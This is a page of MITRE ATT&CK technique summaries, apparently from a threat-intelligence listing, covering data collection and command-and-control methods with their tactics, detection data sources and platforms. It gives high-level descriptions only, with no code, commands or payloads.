Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre